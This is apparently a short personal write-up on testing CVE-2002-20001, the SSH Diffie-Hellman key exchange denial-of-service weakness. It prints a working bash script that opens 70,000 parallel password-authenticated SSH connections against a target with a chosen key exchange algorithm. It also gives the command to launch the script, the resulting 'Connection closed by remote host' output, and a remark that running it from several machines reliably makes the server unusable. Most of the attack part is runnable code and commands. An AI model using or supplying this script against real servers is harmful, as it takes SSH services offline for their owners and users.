This test was created when I worked with CVE-2002-20001 vulnerability. The vulnerability is about diffie-hellman-group-exchange-sha256 key exchange algorithm with high computational complexity which is using long exponents that arguably make certain calculations unnecessarily expensive. To test the issue I created small bash script ddosssh.sh to simulate DDoS attack on ssh server using different key exchange algorithm. The script code is:
#! /bin/bash if [ $# -ne 2 ]; then echo "No arguments: server ID/FQDN and kex algorithm" exit fi for i in {0..70000} do sshpass -p 12345 ssh -o KexAlgorithms=$2 admin@$1 & done
To run the script you need to install sshpash, for CentOS:
yum install sshpass |
Then I started ddosssh.sh with diffie-hellman-group-exchange-sha256 key exchange algorithm:
./ddosssh.sh 192.168.2.40 diffie-hellman-group-exchange-sha256 |
Attempt to do login via ssh to the same server shows me this:
# ssh root@192.168.2.40 ssh_exchange_identification: Connection closed by remote host |
However attempts with other Kex algorithms do not show significant differences sometime login was denied as well. However when I ran script from different computers in other works doing DDoS attack instead of DoS the ssh server on target machine falls in unusable state always.